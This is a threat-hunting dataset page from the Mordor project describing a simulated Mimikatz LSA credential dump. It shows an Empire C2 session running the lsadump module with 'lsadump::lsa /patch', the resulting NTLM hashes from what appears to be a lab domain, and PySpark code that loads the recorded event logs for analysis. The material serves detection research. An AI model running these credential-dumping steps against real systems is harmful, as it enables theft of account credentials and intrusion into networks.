Empire Mimikatz Lsadump LSA Patch

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

[‘TA0006’]

Techniques

[‘T1003.001’]

Tags

[‘LSASS Memory Credentials Read’]

Dataset Description

This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

LSASS Access from Non System Account

https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

lsadump

Adversary View

(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*
(Empire: powershell/credentials/mimikatz/lsadump) > info

              Name: Invoke-Mimikatz LSA Dump
            Module: powershell/credentials/mimikatz/lsadump
        NeedsAdmin: True
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract a
  particular user hash from memory. Useful on domain
  controllers.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt
  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls
  a

Options:

  Name     Required    Value                     Description
  ----     --------    -------                   -----------
  Agent    True        B7Y8G4XC                  Agent to run module on.                 
  Username False                                 Username to extract the hash for, blank 
                                                for all local passwords.                

(Empire: powershell/credentials/mimikatz/lsadump) > execute
[*] Tasked B7Y8G4XC to run TASK_CMD_JOB
[*] Agent B7Y8G4XC tasked with task ID 2
[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump
(Empire: powershell/credentials/mimikatz/lsadump) > 
Job started: VGHXZ5

Hostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380

RID  : 000001f7 (503)
User : DefaultAccount
LM   : 
NTLM : 

RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 

RID  : 000001f4 (500)
User : wardog
LM   : 
NTLM : 42ddb2963bbe8f1c075fc869d3bce33e

RID  : 000001f8 (504)
User : WDAGUtilityAccount
LM   : 
NTLM : 45a313f1860be24e967e55b94649aa31

(Empire: powershell/credentials/mimikatz/lsadump) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |2859 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |2505 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |279  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |162  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |150  |
|WORKSTATION5.theshire.local|Security                                |5156   |79   |
|MORDORDC.theshire.local    |Security                                |4658   |64   |
|MORDORDC.theshire.local    |Security                                |5158   |61   |
|MORDORDC.theshire.local    |Security                                |5156   |55   |
|WORKSTATION5.theshire.local|Security                                |5158   |48   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |48   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |3      |38   |
|WORKSTATION6.theshire.local|Security                                |5156   |38   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |37   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |3      |36   |
|WORKSTATION6.theshire.local|Security                                |4703   |32   |
|MORDORDC.theshire.local    |Security                                |4656   |32   |
|MORDORDC.theshire.local    |Security                                |4663   |32   |
|MORDORDC.theshire.local    |Security                                |4690   |32   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |10     |30   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows